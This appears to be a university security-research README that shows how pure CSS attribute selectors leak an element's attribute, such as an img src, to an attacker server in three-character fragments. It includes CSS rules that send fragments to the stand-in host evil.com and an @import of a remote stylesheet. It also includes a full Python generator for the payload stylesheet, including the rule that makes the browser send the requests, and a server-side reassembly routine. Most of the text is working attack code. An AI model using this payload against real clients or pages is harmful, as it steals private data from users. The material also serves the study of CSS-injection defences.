By using CSS attribute selectors such as `img[src*='xyz']`, text can be exfiltrated from HTML attributes with pure CSS, without any JavaScript.
The idea is inspired by Paul Gerste's talk "Stealing With Style: Using CSS to Exploit ProtonMail & Friends" at Black Hat 2023.
We want to exfiltrate the image's `src` attribute using pure CSS (the same approach works for any other attribute or element):

```html
<style>
@import url("http://evil.com/style.css");
</style>
<img src="abcde">
```
- The client uses `@import` to load the malicious stylesheet from the attacker's server. That stylesheet consists of one selector for every possible 3-character combination (trigram) that the secret could contain, i.e. all combinations over the assumed character set.
```css
/* One rule per trigram. A rule only applies when the img's src contains
   that trigram; the url() in its value then reports the trigram to the
   attacker's server. Shown here: the three rules that match src="abcde". */
img[src*='abc']{
--abc: url('http://evil.com/?fragment=abc');
}
img[src*='bcd']{
--bcd: url('http://evil.com/?fragment=bcd');
}
img[src*='cde']{
--cde: url('http://evil.com/?fragment=cde');
}
```

Note that a `url()` stored in a custom property is only requested once the property is actually consumed by a `var()` substitution (for example in a `background-image` declaration); a declaration alone does not trigger the request, so the generated stylesheet also has to reference every property somewhere.
- The browser therefore requests one URL for every 3-character combination that occurs in the attribute, leaking every trigram of the secret to the server (in no particular order).
- The server reassembles the fragments like a puzzle, overlapping the last two characters of one fragment with the first two of the next, to recover the secret:

```text
Received: cde, abc, bcd
1. Merge 'bcd' + 'cde' (overlap 'cd') -> 'bcde'
2. Merge 'abc' + 'bcde' (overlap 'bc') -> 'abcde'
Secret is: abcde
```
The technique has several limitations:
- The fragments do not always reassemble unambiguously; several candidate secrets can share the same set of trigrams (for example `abcab`, `bcabc` and `cabca` all produce exactly the fragments `abc`, `bca`, `cab`).
- Long secrets over a large character set produce very large payloads: the stylesheet needs one rule for every possible 3-character combination, i.e. n^3 rules for a character set of size n (46656 rules for `[a-z0-9]`).
- The length of the secret and the set of characters it may contain must be known in advance.
- A given 3-character combination is only reported once, even if it occurs several times in the secret, so secrets that repeat a trigram cannot be reconstructed faithfully.
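The following script is an added example that is not part of this repository's code: it implements both halves of the procedure above, the attacker-side payload generator (one rule per k-gram over a chosen character set, generalised from the page's fixed 3-character case) and the server-side reassembly, and it makes the limitations above visible by returning every candidate secret rather than one. The names `build_payload`, `fragments_of` and `reassemble` are this example's own; `http://evil.com` is the page's placeholder. The final `background-image` rule that consumes all custom properties is an assumption of this example about how the `url()` values get requested, since the page does not show the complete stylesheet.

```python
import itertools
from urllib.parse import quote

# Placeholder attacker endpoint taken from the page (hypothetical host).
ORIGIN = "http://evil.com"


def css_escape(s):
    """Escape a k-gram for use inside a single-quoted attribute selector."""
    return s.replace("\\", "\\\\").replace("'", "\\'")


def build_payload(charset, k=3, tag="img", attr="src", origin=ORIGIN):
    """Return a stylesheet with one rule per k-gram over `charset`.

    Each rule mirrors the page's img[src*='abc']{--abc:url(...)} pattern,
    except that the properties are numbered (--f0, --f1, ...) so k-grams
    that are not valid CSS identifiers still get a usable name. The last
    rule is this example's assumption: a url() kept in a custom property is
    only fetched once a var() consumes it, so every property is referenced
    from one background-image declaration, with `none` as fallback for the
    properties the cascade never set on the element.
    """
    grams = ["".join(p) for p in itertools.product(charset, repeat=k)]
    rules, names = [], []
    for i, g in enumerate(grams):
        name = f"--f{i}"
        names.append(name)
        rules.append(
            f"{tag}[{attr}*='{css_escape(g)}']{{{name}:"
            f"url('{origin}/?fragment={quote(g, safe='')}');}}"
        )
    consumer = ",".join(f"var({n},none)" for n in names)
    rules.append(f"{tag}{{background-image:{consumer};}}")
    return "\n".join(rules)


def fragments_of(secret, k=3):
    """What the victim's browser reveals: the *set* of k-grams present in the
    attribute. Order is lost, and a k-gram that occurs twice is reported once,
    which is exactly the 'matched once' limitation described on the page."""
    return {secret[i:i + k] for i in range(len(secret) - k + 1)}


def reassemble(fragments, length, k=3):
    """Return every string of `length` characters whose set of k-grams is
    exactly `fragments`. More than one result means the fragments are
    ambiguous; fragments may be reused while walking, because a repeated
    k-gram in the secret only arrives once."""
    frags = set(fragments)
    by_prefix = {}
    for f in frags:
        by_prefix.setdefault(f[:k - 1], []).append(f)
    results = []

    def walk(cur, used):
        if len(cur) == length:
            if used == frags:          # every received fragment must be explained
                results.append(cur)
            return
        # Extend by any fragment whose first k-1 chars overlap our last k-1.
        for nxt in by_prefix.get(cur[-(k - 1):], []):
            walk(cur + nxt[-1], used | {nxt})

    for start in sorted(frags):
        walk(start, {start})
    return sorted(results)


if __name__ == "__main__":
    print(build_payload("abc", k=2))
    print(reassemble(fragments_of("abcde"), 5))    # ['abcde']
    print(reassemble(fragments_of("abcab"), 5))    # ['abcab', 'bcabc', 'cabca']
    print(reassemble(fragments_of("abcabc"), 6))   # ['abcabc', 'bcabca', 'cabcab']
```

`reassemble` is a depth-first search over overlapping fragments rather than the greedy merge shown above; that is deliberate, because the greedy merge silently picks one of several valid orderings, whereas listing every candidate shows the operator how much ambiguity is left and whether a second measurement (for example with a different `k`) is needed. Payload size grows as `len(charset) ** k`, so for a realistic character set the generated stylesheet is large; this is the second limitation above, not something the generator can avoid.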
This repository was created during security research at university. It is intended for educational purposes only and must not be used for illegal activities. The author assumes no liability for any damage caused by the use of this code.